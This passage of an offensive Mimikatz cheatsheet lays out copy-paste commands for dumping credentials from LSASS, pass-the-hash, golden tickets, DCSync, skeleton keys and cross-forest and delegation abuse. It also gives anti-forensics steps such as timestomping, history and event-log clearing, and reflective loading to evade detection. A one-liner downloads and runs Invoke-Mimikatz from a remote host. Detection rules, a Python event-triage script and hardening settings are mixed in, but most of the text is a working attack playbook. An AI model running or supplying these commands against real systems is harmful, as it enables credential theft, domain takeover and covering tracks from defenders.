$(Get-Item C:\temp\mimikatz.exe).CreationTime = $(Get-Date "01/01/2019 12:00:00")
# Remove artifacts
Remove-Item -Path C:\temp\*.kirbi -Force
Remove-Item -Path C:\temp\*.dmp -Force
# Clear PowerShell history (the PSReadline file covers all sessions; Clear-History only the current one)
Remove-Item (Get-PSReadlineOption).HistorySavePath
Clear-History
Output Parsing & Automation¶
Parsing Mimikatz Output¶
Extracting Credentials Efficiently
# Parse for NTLM hashes. mimikatz pads the field names ("* NTLM     : <hash>"), so "NTLM : " never matches; use \s+
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' |
    Select-String -Pattern 'NTLM\s+:\s*([0-9a-f]{32})' -AllMatches |
    ForEach-Object { $_.Matches | ForEach-Object { $_.Groups[1].Value } } | Sort-Object -Unique
# Extract all credentials to CSV
$output = Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
$credentials = @()
$output -split "`r?`n" | ForEach-Object {
    if ($_ -match '^\s*\*\s*Username\s*:\s*(.+?)\s*$') { $username = $matches[1] }
    if ($_ -match '^\s*\*\s*Domain\s*:\s*(.+?)\s*$')   { $domain = $matches[1] }
    if ($_ -match '^\s*\*\s*NTLM\s*:\s*([0-9a-f]{32})') {
        $credentials += [PSCustomObject]@{
            Username = $username
            Domain   = $domain
            NTLM     = $matches[1]
        }
    }
}
# The same secret is reported by msv, tspkg and kerberos for one session, so deduplicate
$credentials = $credentials | Sort-Object Domain, Username, NTLM -Unique
$credentials | Export-Csv -Path C:\temp\creds.csv -NoTypeInformation
# Auto-format for hashcat (-m 1000 --username expects user:hash)
$credentials | ForEach-Object { "{0}\{1}:{2}" -f $_.Domain, $_.Username, $_.NTLM } | Out-File C:\temp\hashes.txt
Quick Reference Matrix¶
Mimikatz Module Decision Tree
| Objective | Module | Command | Requirements |
|---|---|---|---|
| Dump plaintext passwords | sekurlsa | sekurlsa::logonpasswords | Local admin + SeDebugPrivilege; WDigest cleartext only if UseLogonCredential=1 |
| Dump NTLM hashes | sekurlsa | sekurlsa::msv | Local admin + SeDebugPrivilege |
| Extract Kerberos tickets | sekurlsa / kerberos | sekurlsa::tickets /export | Local admin + SeDebugPrivilege (kerberos::list for your own session needs nothing) |
| Golden ticket | kerberos | kerberos::golden | krbtgt hash or AES key + domain SID |
| Silver ticket | kerberos | kerberos::golden /service: | Service account hash or AES key + domain SID |
| Pass-the-hash | sekurlsa | sekurlsa::pth | NTLM hash or AES key; local admin |
| DCSync | lsadump | lsadump::dcsync | DS-Replication-Get-Changes(-All) on the domain |
| Dump SAM / LSA secrets / cache | lsadump | lsadump::sam, ::secrets, ::cache | SYSTEM (token::elevate) or the hive files |
| Extract certificates | crypto | crypto::certificates /export | Admin for LOCAL_MACHINE; crypto::capi / crypto::cng for non-exportable keys |
| Credential Manager | vault | vault::cred /patch | Admin (SYSTEM for other users' vaults) |
| DPAPI decryption | dpapi | dpapi::masterkey | Master key, or password/hash, or backup .pvk, or /rpc as the owner |
| Chrome passwords | dpapi | dpapi::chrome | Owner's master key (+ Local State on Chrome 80+; SYSTEM key on 127+) |
| Token impersonation | token | token::elevate | Local admin + SeDebugPrivilege |
| Skeleton key | misc | misc::skeleton | Domain Admin, run on a DC that does not have RunAsPPL |
Detection & OPSEC¶
High-Risk Indicators
Critical Detection Events (Security log unless noted):
- 4672 / 4703: SeDebugPrivilege assigned to a logon or enabled in a token by something that is not a debugger (privilege::debug)
- 4688 with command line: mimikatz.exe, rundll32 comsvcs.dll MiniDump, procdump -ma lsass; renaming the binary does not help when the command line is logged
- 4624 Logon Type 9 with Logon Process "seclogo": sekurlsa::pth or runas /netonly on the source host
- 4776 / 4624 type 3 NTLM on the target: pass-the-hash; 4768 with etype 0x17 (RC4) for an account whose logons are otherwise AES: over-pass-the-hash
- 4769 with RC4 (0x17) on an AES domain, or a 4769 with no preceding 4768 from that host: forged golden/silver ticket; a TGT lifetime of 10 years is the kerberos::golden default
- 4662 on the domain object with properties {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} (DS-Replication-Get-Changes) / {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} (DS-Replication-Get-Changes-All) from an account that is not a DC: DCSync
- Sysmon 10: a process other than the expected set (MsMpEng, csrss, wininit, the EDR agent) opening lsass.exe with 0x1010 or 0x1fffff access
- System 7045 / Security 4697: a new service installing mimidrv or another driver; Microsoft-Windows-CodeIntegrity/Operational 3033 / 3063: blocked or unsigned driver load
- Microsoft-Windows-PowerShell/Operational 4104: script blocks containing Invoke-Mimikatz, sekurlsa::, DumpCreds
- Security 1102 / System 104: event log cleared
- Microsoft-Windows-Windows Defender/Operational 5001 / 5004: real-time protection turned off or reconfigured
Memory Indicators:
- LSASS.exe memory access patterns (MiniDumpWriteDump, bulk ReadProcessMemory)
- Unsigned process reading LSASS
- Known Mimikatz strings in memory (banner, module names) even when the file is renamed or loaded reflectively
- Abnormal privilege token usage (a SYSTEM token inside a user's process)
Network Indicators:
- MS-DRSR replication traffic (DRSUAPI DsGetNCChanges) from an IP that is not a DC
- Kerberos tickets with suspicious lifetimes, or RC4 etype where AES is the norm
- NTLM authentication from unusual sources, or from accounts that normally use Kerberos
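The indicators above are only useful if they are checked mechanically. The triage function below is an added example, not part of the original cheatsheet or of any SIEM product: it runs the DCSync, pass-the-hash, RC4-ticket, LSASS-access and log-cleared rules over event records expressed as flat dictionaries whose keys are the EventData field names from the Windows event XML (SubjectUserName, LogonType, LogonProcessName, TicketEncryptionType, Properties, GrantedAccess, ...). The sample events are constructed; the set of processes allowed to read LSASS and the list of DC computer accounts are assumptions you would replace with your own baseline.

```python
import re

# Control-access-right GUIDs that appear in the Properties field of 4662 for a replication request
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
RC4_ETYPES = {"0x17", "0x18"}            # rc4-hmac, rc4-hmac-exp
PROCESS_VM_READ = 0x0010                 # the access right every LSASS dumper needs
SYSMON = "Microsoft-Windows-Sysmon/Operational"
# Assumed baseline of processes that legitimately read LSASS; tune to the environment
LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe", "svchost.exe", "wmiprvse.exe", "mssense.exe"}
_GUID = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def triage(events, dc_accounts=frozenset()):
    """Return (rule, event_id, detail) tuples for events matching a mimikatz-related indicator.
    dc_accounts: the computer accounts of domain controllers (e.g. {"DC01$"}), which replicate legitimately."""
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == 4662:
            guids = set(_GUID.findall(e.get("Properties", "").lower()))
            hits = guids & REPLICATION_GUIDS.keys()
            if hits and e.get("SubjectUserName", "").upper() not in dc_accounts:
                rights = ", ".join(sorted(REPLICATION_GUIDS[g] for g in hits))
                findings.append(("DCSync", eid, f"{e['SubjectUserName']} requested {rights}"))
        elif eid == 4624 and str(e.get("LogonType")) == "9" and e.get("LogonProcessName", "").lower() == "seclogo":
            findings.append(("Pass-the-hash (netonly logon)", eid,
                             f"{e.get('SubjectUserName')} started a session as {e.get('TargetUserName')} on {e.get('Computer')}"))
        elif eid in (4768, 4769) and e.get("TicketEncryptionType", "").lower() in RC4_ETYPES:
            kind = "TGT" if eid == 4768 else f"service ticket for {e.get('ServiceName')}"
            findings.append(("RC4 Kerberos ticket", eid, f"{e.get('TargetUserName')} received an RC4 {kind}"))
        elif eid == 10 and e.get("Channel") == SYSMON and e.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            access = int(e.get("GrantedAccess", "0x0"), 16)
            source = e.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
            if access & PROCESS_VM_READ and source not in LSASS_READERS:
                findings.append(("LSASS memory read", eid, f"{e.get('SourceImage')} opened lsass.exe with {hex(access)}"))
        elif eid == 1102:
            findings.append(("Security log cleared", eid, f"by {e.get('SubjectUserName')}"))
    return findings


DC_ACCOUNTS = {"DC01$", "DC02$"}          # assumed
DOMAIN_HEAD = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"   # domainDNS class GUID as logged in ObjectType

# Constructed sample records (field names as in the event XML; values invented)
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": "2", "LogonProcessName": "User32", "SubjectUserName": "-", "TargetUserName": "jdoe", "Computer": "WS01"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": DOMAIN_HEAD,
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": DOMAIN_HEAD,
     "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "LogonType": "9", "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate",
     "SubjectUserName": "jdoe", "TargetUserName": "Administrator", "Computer": "WS01"},
    {"EventID": 4768, "TargetUserName": "jdoe", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TargetUserName": "Administrator@CORP.LOCAL", "ServiceName": "cifs/dc01.corp.local", "TicketEncryptionType": "0x17"},
    {"EventID": 10, "Channel": SYSMON, "SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "Channel": SYSMON, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1102, "SubjectUserName": "jdoe"},
]

if __name__ == "__main__":
    for rule, eid, detail in triage(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"[{eid}] {rule}: {detail}")
```

In production the same function sits behind a `Get-WinEvent` export, a Sysmon forwarder or a SIEM query; the part that matters is the allowlist logic, because every rule here has a benign twin (DCs replicate, Defender reads LSASS, RC4 is still legal on old SPNs) and the signal is the actor, not the event ID.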
Stealth Techniques¶
OPSEC Best Practices
# Use built-in tools when possible
# Instead of Mimikatz for local SAM, LSA secrets and cached creds (needs admin):
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive
# Process offline with impacket (secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL) or with lsadump::sam /system: /sam: on your own machine
# Avoid dropping to disk: load a .NET port (SharpKatz, SafetyKatz) reflectively from a byte array
$asm = [System.Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\tools\SharpKatz.exe'))
$asm.EntryPoint.Invoke($null, @(,[string[]]@('--Command','logonpasswords')))
# Renaming the binary defeats only name-based rules: a "svchost.exe" outside System32, the 4688 command line and the strings in memory still give it away
Copy-Item mimikatz.exe svchost.exe
# Spawning a signed Microsoft binary through sekurlsa::pth /run: is a netonly logon, not process injection; it still produces the 4624 type 9 "seclogo" event, but nothing of mimikatz's is injected into mstsc
sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:"C:\Windows\System32\mstsc.exe /restrictedadmin"
# Time your operations: blend into business hours and avoid security-tool update windows
# Clean up immediately, but think twice about the log: Clear-EventLog writes a 1102 "audit log cleared" under your account, which is louder than what it hides
Remove-Item *.kirbi, *.dmp, *.txt -Force
Clear-EventLog -LogName Security
Common Issues & Troubleshooting¶
Troubleshooting Guide
| Error | Cause | Solution |
|---|---|---|
| ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) | Access denied: LSA Protection (RunAsPPL), Credential Guard, or not elevated with SeDebugPrivilege | privilege::debug from an admin shell; for PPL use !+ and !processprotect /process:lsass.exe /remove |
| ERROR kuhl_m_sekurlsa_acquireLSA ; Key import / Logon list / Modules informations | Minidump from a Windows build or architecture the mimikatz build does not understand | Use an x64 mimikatz at least as new as the dumped OS, ideally on a matching OS |
| ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO | Reading SAM/SECURITY needs SYSTEM, not just admin | token::elevate first, or work from the saved hives |
| ERROR kuhl_m_dpapi_unprotect_blob / no master key in cache | Wrong or missing master key | sekurlsa::dpapi on the box, or dpapi::masterkey with /password, /pvk or /rpc, then retry |
| kerberos::ptt ... KO | Corrupt ticket or wrong format | mimikatz takes .kirbi (KRB-CRED); convert base64 or ccache tickets with Rubeus or impacket's ticketConverter.py |
| ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453) | "Replication access was denied": no DS-Replication-Get-Changes(-All) | Use an account with those ACEs (DA/EA), or grant them (an ACL change defenders watch) |
| ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439) | Object not found: wrong /user or /domain | Check the sAMAccountName and the domain FQDN; use /guid: for objects with unusual names |
| vault::cred shows only encrypted blobs | Not elevated, or LSASS refuses to return cleartext | token::elevate, then vault::cred /patch |
| KRB_AP_ERR_SKEW | Clock skew > 5 min between you and the KDC/target | Sync time with the DC (w32tm /resync) or adjust the forged ticket's /startoffset |
| STATUS_ACCESS_DENIED on !+ | Driver cannot load: no SeLoadDriverPrivilege, or HVCI / driver blocklist | privilege::driver; otherwise another driver, or take a dump from a non-PPL source |
Alternative Tools & Variations¶
Mimikatz Variants & Alternatives
PowerShell Implementations:
- Invoke-Mimikatz (PowerSploit/Empire): reflectively loads the mimikatz PE (powerkatz.dll) from a base64 string embedded in the script
- powerkatz: the DLL build of mimikatz (x86/x64) that Invoke-Mimikatz carries; not a pure-PowerShell reimplementation
- Invoke-mimikittenz: regex-scrapes other processes' memory (browsers, mail clients) for cleartext; never touches LSASS
Compiled Variants:
- SafetyKatz (GhostPack): writes an LSASS minidump with MiniDumpWriteDump, then loads mimikatz via PELoader to parse it; a C# wrapper, not an obfuscated build
- BetterSafetyKatz: fetches the latest mimikatz release at runtime and patches its strings before loading it
- MimiPenguin: Linux tool that scrapes cleartext credentials from process memory; not a mimikatz port
Specialized Tools:
- Rubeus: Kerberos (asktgt, s4u, kerberoast, ptt with base64 tickets)
- SharpKatz: C# port of the sekurlsa, lsadump and dcsync functionality
- NanoDump: minimal LSASS dumper with snapshot/fork modes and an invalid-signature option so the dump file is not recognised on disk
- PPLdump: dumps a PPL-protected process through KnownDlls cache poisoning (fixed in 2022 Windows builds)
- LaZagne: multi-platform password recovery from applications
- Impacket secretsdump.py: remote SAM / LSA / NTDS (DCSync) extraction from Linux
Living-off-the-land:
# Task Manager LSASS dump (GUI): right-click lsass.exe -> Create dump file (writes to %TEMP%)
# Procdump (Microsoft signed, but "procdump -ma lsass" is a standard EDR rule)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Comsvcs.dll method (from an elevated PowerShell, which has SeDebugPrivilege enabled)
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\lsass.dmp full
# Handle duplication: find an existing LSASS handle in another process and DuplicateHandle it, or snapshot LSASS with PssCaptureSnapshot and dump the clone (nanodump --fork); either way you never open lsass.exe yourself
Advanced Scenarios¶
Domain Persistence Chain¶
Complete Domain Takeover
# 1. DCSync for krbtgt (take the aes256_hmac key as well as the NTLM hash)
lsadump::dcsync /domain:corp.local /user:krbtgt
# 2. Create a Golden Ticket with a real account and RID (patched DCs verify PAC_REQUESTOR) and the AES key so the etype matches normal traffic
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /aes256:KRBTGT_AES /user:Administrator /id:500 /groups:512,513,518,519,520 /ptt
# 3. Install Skeleton Key (memory-only, gone at the next reboot, blocked by RunAsPPL on the DC)
misc::skeleton
# 4. Extract the DPAPI backup key (never rotated, so it survives every password change)
lsadump::backupkeys /system:dc01.corp.local /export
# 5. Dump NTDS for offline cracking (IFM copy of ntds.dit plus the SYSTEM hive; parse with secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL)
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
# 6. Golden ticket with ExtraSids: this forges the SID history inside that ticket's PAC only; it does not write sIDHistory to the account
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /sids:S-1-5-21-YYY-519 /ptt
# The durable part is the krbtgt key itself: it stays valid until krbtgt is reset twice, which is exactly what defenders must do after this
Multi-Forest Compromise¶
Cross-Forest Attack Chain
# 1. Dump the trust keys on a DC of forest1: from LSASS memory, or by DCSync of the trust account
lsadump::trust /patch
lsadump::dcsync /domain:forest1.local /user:FOREST2$
# 2. Forge an inter-realm TGT with the trust key (a golden ticket whose service is krbtgt/forest2.local)
kerberos::golden /domain:forest1.local /sid:S-1-5-21-XXX /rc4:TRUST_HASH /user:Administrator /service:krbtgt /target:forest2.local /ticket:trust.kirbi
# 3. Inject it
kerberos::ptt trust.kirbi
# 4. Ask forest2's KDC for a service ticket with it (/target takes the SPN)
kerberos::ask /target:cifs/dc.forest2.local
# 5. Access resources
dir \\dc.forest2.local\c$
# Across a forest trust SID filtering strips any /sids outside forest1's own domains, so you are merely a forest1 principal in forest2 and get only what forest2 granted to forest1 users and groups
Constrained Delegation Abuse¶
Delegation Attack Chain
# mimikatz has no S4U2Self/S4U2Proxy; constrained delegation is abused with kekeo or Rubeus once you hold the delegating account's key. mimikatz only comes in if you already have the target service's key, and then you forge a silver ticket and the delegation is irrelevant
# 1. Find accounts trusted for delegation and their allowed SPNs (msDS-AllowedToDelegateTo); TRUSTED_TO_AUTH_FOR_DELEGATION (userAccountControl 0x1000000) means protocol transition, no incoming Kerberos ticket required
Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties msDS-AllowedToDelegateTo,userAccountControl
# 2. Get that account's key: sekurlsa::ekeys on a host where it is logged on, lsadump::dcsync, or kerberoast and crack
sekurlsa::ekeys
# 3. S4U2Self as any user, S4U2Proxy to the allowed SPN, inject (Rubeus syntax; /altservice swaps the service class when only e.g. time/target is listed)
Rubeus.exe s4u /user:svc_web /aes256:KEY /impersonateuser:Administrator /msdsspn:cifs/target.corp.local /altservice:host /ptt
# 4. Use the resulting service ticket
dir \\target.corp.local\c$
# Members of Protected Users and accounts marked "sensitive and cannot be delegated" cannot be impersonated this way; that is the hardening, and there is no workaround in the ticket
Hardening Against Mimikatz¶
Defensive Measures
Windows Settings:
# Enable Credential Guard (VBS + isolated LSA). There is no optional feature called Windows-Defender-Credential-Guard; the documented switches are these registry values (LsaCfgFlags 1 = with UEFI lock, 2 = without) followed by a reboot
reg add HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard /v RequirePlatformSecurityFeatures /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LsaCfgFlags /t REG_DWORD /d 1 /f
# Enable LSA Protection (RunAsPPL; 1 = enabled, deploy through the policy if you want the UEFI lock, 2 = enabled without UEFI lock). Pair it with HVCI so blocklisted drivers (mimidrv, RTCore64) cannot be loaded to undo it
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f
# Disable WDigest cleartext caching (the default since 8.1 / 2012 R2; set it explicitly so nothing depends on the default)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
# LmCompatibilityLevel 5 refuses LM/NTLMv1 and sends NTLMv2 only; it does not disable NTLM. To actually block NTLM (after an audit phase with RestrictSendingNTLMTraffic=1 and AuditReceivingNTLMTraffic=2):
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 5 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 /v RestrictSendingNTLMTraffic /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 /v RestrictReceivingNTLMTraffic /t REG_DWORD /d 2 /f
# Stop caching domain credentials (DCC2). 0 breaks offline logon for laptops, so 1 or 2 is the usual compromise; the value is a REG_SZ
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount /t REG_SZ /d 0 /f
# After any suspected compromise reset krbtgt twice, waiting for replication in between: it is the only way to invalidate golden tickets
Group Policy Settings:
- Enable "Restrict delegation of credentials to remote servers" (Remote Credential Guard / Restricted Admin for RDP) so administrators' credentials never reach the remote host
- Configure "Deny access to this computer from the network" and "Deny log on through Remote Desktop Services" for privileged accounts on workstations (tiering)
- Enable "Account is sensitive and cannot be delegated" for privileged accounts and put them in Protected Users (no NTLM, no RC4 keys, no DCC2 caching, no delegation)
- Keep TGT lifetimes short in the Kerberos policy and enforce AES (msDS-SupportedEncryptionTypes) so RC4 tickets stand out
- Enable "Audit Process Creation" with command line logging, plus PowerShell script block logging and Sysmon event 10 on lsass.exe
Command Cheatsheet¶
Essential Commands Quick Reference
# Quick wins
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
vault::cred /patch
lsadump::sam
# Lateral movement
sekurlsa::pth /user:X /domain:Y /ntlm:Z /run:cmd
kerberos::ptt ticket.kirbi
kerberos::golden /domain:X /sid:Y /krbtgt:Z /user:Admin /ptt
# Persistence
misc::skeleton
kerberos::golden /domain:X /sid:Y /krbtgt:Z /user:backdoor /ticket:golden.kirbi
# Extraction
lsadump::dcsync /domain:X /user:krbtgt
crypto::certificates /systemstore:local_machine /export
dpapi::masterkey /in:file /sid:X /password:Y
# Cleanup
kerberos::purge
token::revert
!processprotect /process:lsass.exe /add
!-
exit
One-Liners¶
Copy-Paste Ready Commands
# Remote mimikatz with output
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' | Out-File C:\temp\creds.txt
# DCSync everything to a file. /csv has no header and mimikatz prints its banner first, so ConvertFrom-Csv cannot parse it; keep the raw text and pull out the tab-separated RID/user/NTLM lines
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /all /csv"' | Out-File -FilePath C:\temp\dcsync_raw.txt
Select-String -Path C:\temp\dcsync_raw.txt -Pattern '^\d+\t[^\t]+\t[0-9a-f]{32}' | ForEach-Object { $_.Line } | Out-File C:\temp\hashes.txt
# Golden ticket one-liner (real account and RID, realistic lifetime)
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /groups:512,513,518,519,520 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
# Full dump with everything
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "vault::cred /patch" "lsadump::sam" "lsadump::secrets" "lsadump::cache"' | Tee-Object -FilePath C:\temp\full_dump.txt
# Skeleton key with validation (in net use the password comes before /user:, and give the domain)
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC01; net use \\DC01.corp.local\c$ mimikatz /user:corp\Administrator
Final Notes¶
Legal & Ethical Considerations
- Only use in authorized penetration tests
- Always have written permission
- Follow responsible disclosure
- Clean up all artifacts
- Document actions for reports
- Respect data privacy regulations
Pro Tips
- Always run privilege::debug first
- Use token::elevate for SYSTEM operations (lsadump::sam, lsadump::secrets, lsadump::cache, vault::cred)
- Export tickets before purging
- Keep copies of original hashes
- Test in lab before production
- Have rollback plans ready
- Monitor your own activity
- Use process injection for stealth
- Combine with other tools for better results
- Remember: Mimikatz is loud; use wisely